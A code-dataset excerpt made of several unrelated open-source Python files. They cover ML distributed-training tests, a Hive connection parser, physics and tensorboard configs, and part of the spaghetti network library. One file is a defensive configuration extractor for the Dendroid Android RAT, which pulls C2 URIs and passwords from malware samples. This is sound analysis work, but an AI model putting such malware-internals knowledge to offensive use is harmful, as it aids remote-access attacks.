ComputationModel._ext_local_rank = None
if lrank is not None:
os.environ["LOCAL_RANK"] = lrank
def _test__native_dist_model_create_from_context_no_dist(true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=1, rank=0)
dist.barrier()
_test__native_dist_model_create_from_context_no_local_rank()
true_conf = {
"device": true_device,
"local_rank": 0,
"rank": 0,
"world_size": 1,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": 1,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
def _test__native_dist_model_create_from_context_dist(local_rank, rank, world_size, true_backend, true_device):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group(true_backend, "tcp://0.0.0.0:2222", world_size=world_size, rank=rank)
dist.barrier()
if torch.cuda.is_available():
torch.cuda.set_device(local_rank)
true_conf = {
"device": true_device,
"local_rank": local_rank,
"rank": rank,
"world_size": world_size,
"node_index": 0,
"nnodes": 1,
"nproc_per_node": world_size,
}
_test__native_dist_model_create_from_context_env_local_rank(true_conf)
_test__native_dist_model_create_from_context_set_local_rank(true_conf)
dist.destroy_process_group()
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
def test__native_dist_model_create_no_dist_gloo(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("gloo", device)
_test__native_dist_model_create_from_context_no_dist("gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Should be no-dist config")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_no_dist_nccl(clean_env):
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_no_dist("nccl", device)
_test__native_dist_model_create_from_context_no_dist("nccl", device)
@pytest.mark.distributed
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_gloo_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_gloo_1')}/shared"
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_backend_dist(init_method, local_rank, local_rank, world_size, "gloo", device)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
def test__native_dist_model_create_dist_gloo_2(local_rank, world_size):
device = torch.device(f"cuda:{local_rank}" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "gloo", device)
_test__native_dist_model_create_from_backend_slurm(local_rank, local_rank, world_size, "gloo", device)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_create_dist_nccl_1(init_method, get_fixed_dirname, local_rank, world_size):
if init_method == "FILE":
init_method = f"file://{get_fixed_dirname('native_dist_model_create_dist_nccl_1')}/shared"
_test__native_dist_model_create_from_backend_dist(
init_method, local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
if init_method is None:
_test__native_dist_model_create_from_backend_slurm(
local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}"
)
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test__native_dist_model_create_dist_nccl_2(local_rank, world_size):
_test__native_dist_model_create_from_context_dist(local_rank, local_rank, world_size, "nccl", f"cuda:{local_rank}")
@pytest.mark.distributed
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Skip if less than 2 GPUs")
def test__native_dist_model_warning_index_less_localrank(local_rank, world_size):
assert _NativeDistModel.create_from_context() is None
dist.init_process_group("nccl", "tcp://0.0.0.0:2222", world_size=world_size, rank=local_rank)
dist.barrier()
# We deliberately incorrectly set cuda device to 0
torch.cuda.set_device(0)
model = _NativeDistModel.create_from_context()
assert isinstance(model, _NativeDistModel), f"{type(model)} vs _NativeDistModel"
if local_rank == 1:
with pytest.warns(UserWarning, match=r"Current device index is less than current local rank."):
model.device()
dist.destroy_process_group()
def _test_dist_spawn_fn(local_rank, backend, world_size, device):
from ignite.distributed.utils import _model
assert dist.is_available() and dist.is_initialized()
assert dist.get_backend() == backend
assert isinstance(_model, _NativeDistModel), f"{type(_model)} vs _NativeDistModel"
assert _model.get_local_rank() == local_rank
assert _model.get_world_size() == world_size
assert _model.device().type == torch.device(device).type
def _test__native_dist_model_spawn(backend, num_workers_per_machine, device, init_method=None, **spawn_kwargs):
_NativeDistModel.spawn(
_test_dist_spawn_fn,
args=(backend, num_workers_per_machine, device),
kwargs_dict={},
backend=backend,
nproc_per_node=num_workers_per_machine,
init_method=init_method,
**spawn_kwargs,
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.parametrize("init_method", [None, "env://", "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_gloo(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
nproc = torch.cuda.device_count() if torch.cuda.is_available() else 4
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
_test__native_dist_model_spawn("gloo", num_workers_per_machine=nproc, device=device, init_method=init_method)
if device.type == "cpu":
_test__native_dist_model_spawn(
"gloo", num_workers_per_machine=nproc, device=device, start_method="fork", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
@pytest.mark.parametrize("init_method", [None, "tcp://0.0.0.0:22334", "FILE"])
def test__native_dist_model_spawn_nccl(init_method, dirname):
if init_method == "FILE":
init_method = f"file://{dirname}/shared"
num_workers_per_machine = torch.cuda.device_count()
_test__native_dist_model_spawn(
"nccl", num_workers_per_machine=num_workers_per_machine, device="cuda", init_method=init_method
)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_none(world_size):
with pytest.raises(ValueError, match=r"Arguments rank and world_size should be None"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size)
@pytest.mark.distributed
@pytest.mark.skipif("WORLD_SIZE" in os.environ, reason="Skip if launched as multiproc")
@pytest.mark.skipif(not has_native_dist_support, reason="Skip if no native dist support")
def test__native_dist_model_init_method_is_not_none(world_size, local_rank, get_fixed_dirname):
init_method = f"file://{get_fixed_dirname('native_dist_model_init_method_is_not_none')}/shared"
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", world_size=world_size, init_method=init_method)
with pytest.raises(ValueError, match=r"Both rank and world_size should be provided"):
_NativeDistModel.create_from_backend(backend="gloo", rank=local_rank, init_method=init_method)
@pytest.mark.parametrize(
"environ, expected",
[
# fmt: off
# usual SLURM env
(
{
"SLURM_PROCID": "1", "SLURM_LOCALID": "1", "SLURM_NTASKS": "2", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
},
[1, 1, 2, "c1", 17345]
),
# usual SLURM env mnode
(
{
"SLURM_PROCID": "5", "SLURM_LOCALID": "1", "SLURM_NTASKS": "8", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
},
[5, 1, 8, "c1", 17345]
),
# usual SLURM env 1 node, 1 task + torch.distributed.launch
(
{
"SLURM_PROCID": "0", "SLURM_LOCALID": "0", "SLURM_NTASKS": "1", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "127.0.0.1", "MASTER_PORT": "2233", "RANK": "2", "LOCAL_RANK": "2", "WORLD_SIZE": "8",
},
[2, 2, 8, "127.0.0.1", 2233]
),
# usual SLURM env + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "3", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "3", "WORLD_SIZE": "4",
},
[3, 3, 4, "c1", 12233]
),
# usual SLURM env mnode + enroot's pytorch hook
(
{
"SLURM_PROCID": "3", "SLURM_LOCALID": "1", "SLURM_NTASKS": "4", "SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2", "SLURM_JOB_ID": "12345",
"MASTER_ADDR": "c1", "MASTER_PORT": "12233", "RANK": "3", "LOCAL_RANK": "1", "WORLD_SIZE": "4"
},
[3, 1, 4, "c1", 12233]
),
# fmt: on
],
)
def test__setup_ddp_vars_from_slurm_env(environ, expected):
ddp_keys = ["RANK", "LOCAL_RANK", "WORLD_SIZE", "MASTER_ADDR", "MASTER_PORT"]
ddp_vars = _setup_ddp_vars_from_slurm_env(environ)
for key, value in zip(ddp_keys, expected):
assert key in ddp_vars
assert ddp_vars[key] == value
def test__setup_ddp_vars_from_slurm_env_bad_configs():
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(
RuntimeError, match=r"Environment variable defined for PyTorch Distributed context is inconsistent"
):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "c1",
"SLURM_JOB_ID": "12345",
"MASTER_ADDR": "another-addr",
"MASTER_PORT": "12233",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.warns(UserWarning, match=r"We detected the following env variables"):
environ = {
"SLURM_PROCID": "3",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "2",
"SLURM_JOB_NODELIST": "c1, c2",
"SLURM_JOB_ID": "12345",
"RANK": "1",
"LOCAL_RANK": "1",
"WORLD_SIZE": "2",
}
_setup_ddp_vars_from_slurm_env(environ)
with pytest.raises(RuntimeError, match=r"No hostname detected in SLURM_JOB_NODELIST by ignite"):
environ = {
"SLURM_PROCID": "1",
"SLURM_LOCALID": "1",
"SLURM_NTASKS": "4",
"SLURM_JOB_NUM_NODES": "1",
"SLURM_JOB_NODELIST": "[]",
"SLURM_JOB_ID": "12345",
}
_setup_ddp_vars_from_slurm_env(environ)
|
querybook/server/lib/query_executor/connection_string/hive.py | shivammmmm/querybook | 1,144 | 16034 | import re
from typing import Dict, Tuple, List, NamedTuple, Optional
from lib.utils.decorators import with_exception_retry
from .helpers.common import (
split_hostport,
get_parsed_variables,
merge_hostport,
random_choice,
)
from .helpers.zookeeper import get_hostname_and_port_from_zk
# TODO: make these configurable?
MAX_URI_FETCH_ATTEMPTS = 10
MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC = 5
class RawHiveConnectionConf(NamedTuple):
# Raw Connection Configuration that's from a string -> dict transformation
hosts: List[Tuple[str, Optional[int]]]
default_db: str
session_variables: Dict[str, str]
conf_list: Dict[str, str]
var_list: Dict[str, str]
class HiveConnectionConf(NamedTuple):
host: str
port: Optional[int]
default_db: str
configuration: Dict[str, str]
def _extract_connection_url(connection_string: str) -> RawHiveConnectionConf:
# Parser for Hive JDBC string
# Loosely based on https://cwiki.apache.org/confluence/display/Hive/HiveServer2+Clients#HiveServer2Clients-JDBC
match = re.search(
r"^(?:jdbc:)?hive2:\/\/([\w.-]+(?:\:\d+)?(?:,[\w.-]+(?:\:\d+)?)*)\/(\w*)((?:;[\w.-]+=[\w.-]+)*)(\?[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?(\#[\w.-]+=[\w.-]+(?:;[\w.-]+=[\w.-]+)*)?$", # noqa: E501
connection_string,
)
hosts = match.group(1)
default_db = match.group(2) or "default"
session_variables = match.group(3) or ""
conf_list = match.group(4) or ""
var_list = match.group(5) or ""
parsed_hosts = []
for hostport in hosts.split(","):
parsed_hosts.append(split_hostport(hostport))
parsed_session_variables = get_parsed_variables(session_variables[1:])
parsed_conf_list = get_parsed_variables(conf_list[1:])
parsed_var_list = get_parsed_variables(var_list[1:])
return RawHiveConnectionConf(
hosts=parsed_hosts,
default_db=default_db,
session_variables=parsed_session_variables,
conf_list=parsed_conf_list,
var_list=parsed_var_list,
)
@with_exception_retry(
max_retry=MAX_URI_FETCH_ATTEMPTS,
get_retry_delay=lambda retry: min(MAX_DELAY_BETWEEN_ZK_ATTEMPTS_SEC, retry),
)
def get_hive_host_port_from_zk(
connection_conf: RawHiveConnectionConf,
) -> Tuple[str, int]:
zk_quorum = ",".join(
map(lambda hostport: merge_hostport(hostport), connection_conf.hosts)
)
zk_namespace = connection_conf.session_variables.get("zooKeeperNamespace")
raw_server_uris = get_hostname_and_port_from_zk(zk_quorum, zk_namespace) or []
server_uri_dicts = filter(
lambda d: d is not None,
[_server_uri_to_dict(raw_server_uri) for raw_server_uri in raw_server_uris],
)
server_uris = list(map(lambda d: d["serverUri"], server_uri_dicts))
random_server_uri = random_choice(server_uris)
if not random_server_uri:
raise Exception("Failed to get hostname and port from Zookeeper")
return split_hostport(random_server_uri)
def _server_uri_to_dict(server_uri: str) -> Optional[Dict[str, str]]:
match = re.search(r"serverUri=(.*);version=(.*);sequence=(.*)", server_uri)
if match:
return {
"serverUri": match.group(1),
"version": match.group(2),
"sequence": match.group(3),
}
def get_hive_connection_conf(connection_string: str) -> HiveConnectionConf:
hostname = None
port = None
connection_conf = _extract_connection_url(connection_string)
# We use zookeeper to find host name
if connection_conf.session_variables.get("serviceDiscoveryMode") == "zooKeeper":
hostname, port = get_hive_host_port_from_zk(connection_conf)
else: # We just return a normal host
hostname, port = random_choice(connection_conf.hosts, default=(None, None))
return HiveConnectionConf(
host=hostname,
port=port,
default_db=connection_conf.default_db,
configuration=connection_conf.conf_list,
)
|
xmodaler/modeling/layers/attention_pooler.py | cclauss/xmodaler | 830 | 16057 | # Copyright 2021 JD.com, Inc., JD AI
"""
@author: <NAME>
@contact: <EMAIL>
"""
import torch
import torch.nn as nn
__all__ = ["AttentionPooler"]
class AttentionPooler(nn.Module):
def __init__(
self,
*,
hidden_size: int,
output_size: int,
dropout: float,
use_bn: bool
):
super(AttentionPooler, self).__init__()
self.att = nn.Sequential(
nn.Linear(hidden_size, hidden_size),
nn.ReLU(inplace=True),
nn.Dropout(p=dropout),
nn.Linear(hidden_size, 1)
)
self.embed = nn.Linear(hidden_size, output_size)
self.softmax = nn.Softmax(dim=-1)
self.bn = nn.BatchNorm1d(output_size) if use_bn else None
def forward(self, hidden_states, masks = None, **kwargs):
score = self.att(hidden_states).squeeze(-1)
if masks is not None:
score = score + masks.view(score.size(0), -1)
score = self.softmax(score)
output = score.unsqueeze(1).matmul(hidden_states).squeeze(1)
output = self.embed(output)
if self.bn is not None:
output = self.bn(output)
return output |
CalibTracker/SiStripCommon/python/theBigNtuple_cfi.py | ckamtsikis/cmssw | 852 | 16093 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
from CalibTracker.SiStripCommon.ShallowEventDataProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowDigisProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowClustersProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowTrackClustersProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowRechitClustersProducer_cfi import *
from CalibTracker.SiStripCommon.ShallowTracksProducer_cfi import *
from RecoVertex.BeamSpotProducer.BeamSpot_cff import *
from RecoTracker.TrackProducer.TrackRefitters_cff import *
bigNtupleTrackCollectionTag = cms.InputTag("bigNtupleTracksRefit")
bigNtupleClusterCollectionTag = cms.InputTag("siStripClusters")
bigNtupleTracksRefit = RecoTracker.TrackProducer.TrackRefitter_cfi.TrackRefitter.clone(src = "generalTracks")
bigNtupleEventRun = shallowEventRun.clone()
bigNtupleDigis = shallowDigis.clone()
bigNtupleClusters = shallowClusters.clone(Clusters=bigNtupleClusterCollectionTag)
bigNtupleRecHits = shallowRechitClusters.clone(Clusters=bigNtupleClusterCollectionTag)
bigNtupleTrackClusters = shallowTrackClusters.clone(Tracks = bigNtupleTrackCollectionTag,Clusters=bigNtupleClusterCollectionTag)
bigNtupleTracks = shallowTracks.clone(Tracks = bigNtupleTrackCollectionTag)
bigShallowTree = cms.EDAnalyzer("ShallowTree",
outputCommands = cms.untracked.vstring(
'drop *',
'keep *_bigNtupleEventRun_*_*',
'keep *_bigNtupleDigis_*_*',
'keep *_bigNtupleClusters_*_*' ,
'keep *_bigNtupleRechits_*_*',
'keep *_bigNtupleTracks_*_*',
'keep *_bigNtupleTrackClusters_*_*'
)
)
from Configuration.StandardSequences.RawToDigi_Data_cff import *
from Configuration.StandardSequences.Reconstruction_cff import *
theBigNtuple = cms.Sequence( ( siPixelRecHits+siStripMatchedRecHits +
offlineBeamSpot +
bigNtupleTracksRefit)
* (bigNtupleEventRun +
bigNtupleClusters +
bigNtupleRecHits +
bigNtupleTracks +
bigNtupleTrackClusters
)
)
theBigNtupleDigi = cms.Sequence( siStripDigis + bigNtupleDigis )
|
Chapter 07/hmac-md5.py | Prakshal2607/Effective-Python-Penetration-Testing | 346 | 16148 | import hmac
hmac_md5 = hmac.new('secret-key')
f = open('sample-file.txt', 'rb')
try:
while True:
block = f.read(1024)
if not block:
break
hmac_md5.update(block)
finally:
f.close()
digest = hmac_md5.hexdigest()
print digest |
tests/strict/it_mod_double_fun.py | Euromance/pycopy | 663 | 16166 | import mod
def foo():
return 1
try:
mod.foo = foo
except RuntimeError:
print("RuntimeError1")
print(mod.foo())
try:
mod.foo = 1
except RuntimeError:
print("RuntimeError2")
print(mod.foo)
try:
mod.foo = 2
except RuntimeError:
print("RuntimeError3")
print(mod.foo)
def __main__():
pass
|
src/pyforest/auto_import.py | tnwei/pyforest | 1,002 | 16170 | <gh_stars>1000+
from pathlib import Path
IPYTHON_STARTUP_FOLDER = Path.home() / ".ipython" / "profile_default" / "startup"
STARTUP_FILE = IPYTHON_STARTUP_FOLDER / "pyforest_autoimport.py"
def _create_or_reset_startup_file():
if STARTUP_FILE.exists():
STARTUP_FILE.unlink() # deletes the old file
# this is important if someone messed around with the file
# if he calls our method, he expects that we repair everything
# therefore, we delete the old file and write a new, valid version
STARTUP_FILE.touch() # create a new file
def _write_into_startup_file():
with STARTUP_FILE.open("w") as file:
file.write(
f"""
# HOW TO DEACTIVATE AUTO-IMPORT:
# if you dont want to auto-import pyforest, you have two options:
# 0) if you only want to disable the auto-import temporarily and activate it later,
# you can uncomment the import statement below
# 1) if you never want to auto-import pyforest again, you can delete this file
try:
import pyforest # uncomment this line if you temporarily dont want to auto-import pyforest
pass
except:
pass
"""
)
def setup():
if not IPYTHON_STARTUP_FOLDER.exists():
print(
f"Error: Could not find the default IPython startup folder at {IPYTHON_STARTUP_FOLDER}"
)
return False
_create_or_reset_startup_file()
_write_into_startup_file()
print(
"Success: pyforest is now available in Jupyter Notebook, Jupyter Lab and IPython because it was added to the IPython auto import"
)
return True
|
tests/future_division_eval.py | mayl8822/onelinerizer | 1,062 | 16172 | <filename>tests/future_division_eval.py
from __future__ import division
print eval('1/2')
exec('print 1/2')
eval(compile('print 1/2', 'wat.py', 'exec'))
print eval(compile('1/2', 'wat.py', 'eval'))
print eval(compile('1/2', 'wat.py', 'eval', 0, 0))
print eval(compile('1/2', 'wat.py', 'eval', 0, ~0))
|
BAMF_Detect/modules/dendroid.py | bwall/bamfdetect | 152 | 16204 | from common import Modules, data_strings, load_yara_rules, AndroidParseModule, ModuleMetadata
from base64 import b64decode
from string import printable
class dendroid(AndroidParseModule):
def __init__(self):
md = ModuleMetadata(
module_name="dendroid",
bot_name="Dendroid",
description="Android RAT",
authors=["<NAME> (@botnet_hunter)"],
version="1.0.0",
date="August 18, 2014",
references=[]
)
AndroidParseModule.__init__(self, md)
self.yara_rules = None
pass
def _generate_yara_rules(self):
if self.yara_rules is None:
self.yara_rules = load_yara_rules("dendroid.yara")
return self.yara_rules
def get_bot_information(self, file_data):
results = {}
uri = None
password = None
for s in data_strings(file_data, charset="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/="):
try:
line = b64decode(s)
if len(line) == 0:
continue
valid = True
for c in line:
if c not in printable:
valid = False
if not valid:
continue
if line.lower().startswith("https://") or line.lower().startswith("http://"):
uri = line
continue
if uri is not None:
password = line
break
except TypeError:
continue
if uri is not None:
results["c2_uri"] = uri
if password is not None:
try:
password.decode("utf8")
results["password"] = password
except UnicodeDecodeError:
results["password"] = "h" + password.encode("hex")
return results
Modules.list.append(dendroid()) |
examples/tensorboard/nested.py | dwolfschlaeger/guildai | 694 | 16230 | <filename>examples/tensorboard/nested.py
import tensorboardX
with tensorboardX.SummaryWriter("foo") as w:
w.add_scalar("a", 1.0, 1)
w.add_scalar("a", 2.0, 2)
with tensorboardX.SummaryWriter("foo/bar") as w:
w.add_scalar("a", 3.0, 3)
w.add_scalar("a", 4.0, 4)
with tensorboardX.SummaryWriter("foo/bar/baz") as w:
w.add_scalar("a", 5.0, 5)
w.add_scalar("a", 6.0, 6)
|
spaghetti/network.py | gegen07/spaghetti | 182 | 16315 | <gh_stars>100-1000
from collections import defaultdict, OrderedDict
from itertools import islice
import copy, os, pickle, warnings
import esda
import numpy
from .analysis import GlobalAutoK
from . import util
from libpysal import cg, examples, weights
from libpysal.common import requires
try:
from libpysal import open
except ImportError:
import libpysal
open = libpysal.io.open
__all__ = ["Network", "PointPattern", "GlobalAutoK"]
SAME_SEGMENT = (-0.1, -0.1)
dep_msg = (
"The next major release of pysal/spaghetti (2.0.0) will "
"drop support for all ``libpysal.cg`` geometries. This change "
"is a first step in refactoring ``spaghetti`` that is "
"expected to result in dramatically reduced runtimes for "
"network instantiation and operations. Users currently "
"requiring network and point pattern input as ``libpysal.cg`` "
"geometries should prepare for this simply by converting "
"to ``shapely`` geometries."
)
warnings.warn(f"{dep_msg}", FutureWarning)
class Network:
"""Spatially-constrained network representation and analytical
functionality. Naming conventions are as follows, (1) arcs and
vertices for the full network object, and (2) edges and nodes for
the simplified graph-theoretic object. The term 'link' is used to
refer to a network arc or a graph edge.
Parameters
----------
in_data : {str, iterable (list, tuple, numpy.ndarray), libpysal.cg.Chain, geopandas.GeoDataFrame}
The input geographic data. Either (1) a path to a shapefile
(str); (2) an iterable containing ``libpysal.cg.Chain``
objects; (3) a single ``libpysal.cg.Chain``; or
(4) a ``geopandas.GeoDataFrame``.
vertex_sig : int
Round the x and y coordinates of all vertices to ``vertex_sig``
significant digits (combined significant digits on the left and
right of the decimal place). Default is 11. Set to ``None`` for
no rounding.
unique_arcs : bool
If ``True`` (default), keep only unique arcs (i.e., prune
out any duplicated arcs). If ``False`` keep all segments.
extractgraph : bool
If ``True``, extract a graph-theoretic object with no degree 2
nodes. Default is ``True``.
w_components : bool
Set to ``False`` to not record connected components from a
``libpysal.weights.W`` object. Default is ``True``.
weightings : {dict, bool}
If dict, lists of weightings for each arc. If bool,
``True`` flags ``self.arc_lengths`` as the weightings,
``False`` sets no weightings. Default is ``False``.
weights_kws : dict
Keyword arguments for ``libpysal.weights.W``.
vertex_atol : {int, None}
Precision for vertex absolute tolerance. Round vertex coordinates to
``vertex_atol`` decimal places. Default is ``None``. **ONLY** change
the default when there are known issues with digitization.
Attributes
----------
adjacencylist : list
List of lists storing vertex adjacency.
vertex_coords : dict
Keys are vertex IDs and values are :math:`(x,y)` coordinates of the vertices.
vertex_list : list
List of vertex IDs.
vertices : dict
Keys are tuples of vertex coords and values are the vertex ID.
arcs : list
List of arcs, where each arc is a sorted tuple
of vertex IDs.
arc_lengths : dict
Keys are tuples of sorted vertex IDs representing an arc and
values are the length.
pointpatterns : dict
Keys are a string name of the pattern and values are
``PointPattern`` class instances.
distance_matrix : numpy.ndarray
All network vertices (non-observations) distance matrix. Distances
between vertices in disparate components are recorded as ``inf``
by default.
network_trees : dict
Keys are the vertex IDs (``int``). Values are dictionaries
with the keys being the IDs of the destination vertex
and values being lists of vertices along the shortest path.
If the destination vertex is a) the origin or b)
unreachable (disparate component) it is listed as itself being the
neighbor.
edges : list
Tuples of graph edge IDs.
edge_lengths : dict
Keys are the graph edge IDs (``tuple``). Values are the
graph edge length (``float``).
non_articulation_points : list
All vertices with degree 2 that are not in an isolated
island ring (loop) component.
w_network : libpysal.weights.W
Weights object created from the network arcs.
network_n_components : int
Count of connected components in the network.
network_fully_connected : bool
``True`` if the network representation is a single connected
component, otherwise ``False``.
network_component_labels : numpy.ndarray
Component labels for network arcs.
network_component2arc : dict
Lookup in the form {int: list} for arcs comprising network
connected components keyed by component labels with arcs in
a list as values.
network_component_lengths : dict
Length of each network component (keyed by component label).
network_longest_component : int
The ID of the longest component in the network. This is not
necessarily equal to ``network_largest_component``.
network_component_vertices : dict
Lookup in the form {int: list} for vertices comprising network
connected components keyed by component labels with vertices in
a list as values.
network_component_vertex_count : dict
The number of vertices in each network component
(keyed by component label).
network_largest_component : int
The ID of the largest component in the network. Within ``spaghetti``
the largest component is the one with the most vertices. This is not
necessarily equal to ``network_longest_component``.
network_component_is_ring : dict
Lookup in the form {int: bool} keyed by component labels with values
as ``True`` if the component is a closed ring, otherwise ``False``.
w_graph : libpysal.weights.W
Weights object created from the graph edges.
graph_n_components : int
Count of connected components in the network.
graph_fully_connected : bool
``True`` if the graph representation is a single connected
component, otherwise ``False``.
graph_component_labels : numpy.ndarray
Component labels for graph edges.
graph_component2edge : dict
Lookup in the form {int: list} for edges comprising graph connected
components keyed by component labels with edges in a list
as values.
graph_component_lengths : dict
Length of each graph component (keyed by component label).
graph_longest_component : int
The ID of the longest component in the graph. This is not
necessarily equal to ``graph_largest_component``.
graph_component_vertices : dict
Lookup in the form {int: list} for vertices comprising graph
connected components keyed by component labels with vertices in
a list as values.
graph_component_vertex_count : dict
The number of vertices in each graph component
(keyed by component label).
graph_largest_component : int
The ID of the largest component in the graph. Within ``spaghetti``
the largest component is the one with the most vertices. This is not
necessarily equal to ``graph_longest_component``.
graph_component_is_ring : dict
Lookup in the form {int: bool} keyed by component labels with values as
``True`` if the component is a closed ring, otherwise ``False``.
Notes
-----
**Important**: The core procedure for generating network representations is
performed within the ``_extractnetwork()`` method. Here it is important to note
that a ``spaghetti.Network`` instance is built up from the individual,
constituent euclidean units of each line segment object. Therefore, the resulting
network structure will generally have (1) more vertices and links than may expected,
and, (2) many degree-2 vertices, which differs from a truly graph-theoretic object.
This is demonstrated in the
`Caveats Tutorial <https://pysal.org/spaghetti/notebooks/caveats.html#4.-Understanding-network-generation>`_.
See :cite:`Cliff1981`, :cite:`Tansel1983a`,
:cite:`AhujaRavindraK`, :cite:`Labbe1995`,
:cite:`Kuby2009`, :cite:`Barthelemy2011`,
:cite:`daskin2013`, :cite:`Okabe2012`,
:cite:`Ducruet2014`, :cite:`Weber2016`, for more in-depth discussion on
spatial networks, graph theory, and location along networks.
For related network-centric software see
`Snkit <https://github.com/tomalrussell/snkit>`_ :cite:`tom_russell_2019_3379659`,
`SANET <http://sanet.csis.u-tokyo.ac.jp>`_ :cite:`Okabe2006a`,
`NetworkX <https://networkx.github.io>`_ :cite:`Hagberg2008`,
`Pandana <http://udst.github.io/pandana/>`_ :cite:`Foti2012`,
and `OSMnx <https://osmnx.readthedocs.io/en/stable/>`_ :cite:`Boeing2017`.
Examples
--------
Create an instance of a network.
>>> import spaghetti
>>> from libpysal import examples
>>> streets_file = examples.get_path("streets.shp")
>>> ntw = spaghetti.Network(in_data=streets_file)
Fetch the number connected components in the network.
>>> ntw.network_n_components
1
Unique component labels in the network.
>>> import numpy
>>> list(numpy.unique(ntw.network_component_labels))
[0]
Show whether each component of the network is an isolated ring (or not).
>>> ntw.network_component_is_ring
{0: False}
Show how many network arcs are associated with the component.
>>> arcs = len(ntw.network_component2arc[ntw.network_component_labels[0]])
>>> arcs
303
Do the same as above, but for the graph-theoretic representation
of the network object.
>>> ntw.graph_n_components
1
>>> list(numpy.unique(ntw.graph_component_labels))
[0]
>>> ntw.graph_component_is_ring
{0: False}
>>> edges = len(ntw.graph_component2edge[ntw.graph_component_labels[0]])
>>> edges
179
The number of arcs in the network is always greater than or equal
to the number of edges in the graph-theoretic representation.
>>> arcs >= edges
True
Snap point observations to the network with attribute information.
>>> crimes_file = examples.get_path("crimes.shp")
>>> ntw.snapobservations(crimes_file, "crimes", attribute=True)
And without attribute information.
>>> schools_file = examples.get_path("schools.shp")
>>> ntw.snapobservations(schools_file, "schools", attribute=False)
Show the point patterns associated with the network.
>>> ntw.pointpatterns.keys()
dict_keys(['crimes', 'schools'])
"""
def __init__(
self,
in_data=None,
vertex_sig=11,
unique_arcs=True,
extractgraph=True,
w_components=True,
weightings=False,
